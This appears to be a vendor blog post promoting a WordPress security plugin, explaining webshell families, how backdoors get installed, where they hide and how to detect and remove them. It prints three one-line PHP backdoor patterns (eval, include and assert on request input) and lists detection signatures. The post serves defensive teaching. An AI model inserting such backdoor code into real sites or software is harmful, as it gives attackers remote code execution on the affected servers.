
Detecting WordPress Webshells and Backdoors: Complete Guide

Learn how hackers use webshells and backdoors to maintain persistent access to WordPress sites. Discover detection techniques and removal strategies.

Emily Rodriguez

Webshells and backdoors are among the most dangerous forms of WordPress malware. They give hackers persistent access to your site, allowing them to return even after you think you've cleaned the infection. Understanding how they work is crucial for complete removal.

What is a WordPress Webshell?

A webshell is a malicious script that provides a web-based interface for hackers to control your server. Once uploaded, attackers can browse files, execute commands, access databases, and upload additional malware—all through their web browser.

Popular Webshell Families

FilesMan

One of the most common webshells targeting WordPress. Features file management, database access, and command execution. Often found in uploads or disguised as legitimate plugin files.

WSO (Web Shell by Orb)

A feature-rich webshell with file editing, SQL execution, and network tools. Frequently updated to evade detection with new obfuscation techniques.

c99 Shell

An older but still prevalent webshell. Known for its self-destruct feature that can wipe itself to avoid forensic analysis.

b374k

A minimalist webshell that's harder to detect due to its small footprint. Can be as small as a few hundred bytes when obfuscated.

What is a WordPress Backdoor?

Backdoors are simpler than webshells but equally dangerous. They provide a hidden entry point for attackers to execute code on your server. Common backdoor patterns include:

Eval Backdoors

<?php eval($_POST['cmd']); ?>

Simple but effective. Allows execution of any PHP code sent via POST request.

Include Backdoors

<?php include($_GET['page']); ?>

Enables loading external malicious files or sensitive local files.

Assert Backdoors

<?php @assert($_REQUEST['x']); ?>

Uses PHP's assert() function to execute arbitrary code, and is often overlooked by basic scanners. Note that assert() stopped evaluating string arguments in PHP 8.0, so this pattern only executes on older PHP versions, but it still turns up on unpatched hosts.

How Webshells and Backdoors Get Installed

  1. Vulnerable plugins: Exploiting upload vulnerabilities in outdated plugins
  2. Theme vulnerabilities: Especially in nulled (pirated) premium themes
  3. Compromised admin accounts: Direct upload via media library or theme editor
  4. Server-level compromise: Exploiting other sites on shared hosting
  5. Supply chain attacks: Infected plugins from unofficial sources

Detecting Webshells and Backdoors

Common File Locations

Webshells typically hide in these locations:

  • wp-content/uploads/ - Especially files named like images but ending in .php
  • wp-includes/ - Disguised as core WordPress files
  • wp-content/themes/*/ - Hidden in inactive themes
  • wp-content/plugins/*/ - Inside plugin directories
  • Root directory with names like wp-info.php or class.php

Suspicious File Characteristics

  • Files with base64_decode, eval, or assert functions
  • Heavily obfuscated code with long strings of characters
  • Files accessing $_POST, $_GET, or $_REQUEST variables unsafely
  • PHP files with image extensions (.jpg.php, .gif.php)
  • Files with creation dates that don't match other files

Using WP Folder Shield for Detection

WP Folder Shield's malware scanner specifically targets webshells and backdoors:

  • Signature detection: Identifies known webshell families by their unique code patterns
  • Function analysis: Flags dangerous function combinations like eval+base64_decode
  • File location checks: Alerts on PHP files in uploads directory
  • Core file verification: Detects backdoors injected into legitimate WordPress files
  • Permission checks: Identifies files with suspicious permissions

Removing Webshells and Backdoors

Step 1: Full Site Backup

Before any cleanup, back up your entire site, including the database. You may need to reference the infected files later.

Step 2: Complete Scan

Run a comprehensive scan to identify ALL infected files. Webshells often come in pairs—a main shell and backup files.

Step 3: Remove or Replace

For core files, replace with clean copies from WordPress.org. For custom files, manually remove the malicious code. Delete any files that shouldn't exist.

Step 4: Database Cleanup

Check wp_options and wp_posts for injected backdoors. Some backdoors store themselves in the database and recreate files on each page load.

Step 5: Patch the Entry Point

Identify and fix the vulnerability that allowed the initial compromise. Update plugins, change passwords, and review user accounts.

Preventing Future Infections

After cleanup, prevent reinfection with WP Folder Shield's protective features:

  • Directory protection: Block PHP execution in wp-content/uploads
  • Web application firewall: Block common upload exploits
  • File integrity monitoring: Alert on any file changes
  • Login security: Prevent brute force attacks on admin accounts

Get WP Folder Shield to detect and remove webshells before they compromise your site.

Written by Emily Rodriguez

WP Folder Shield Team
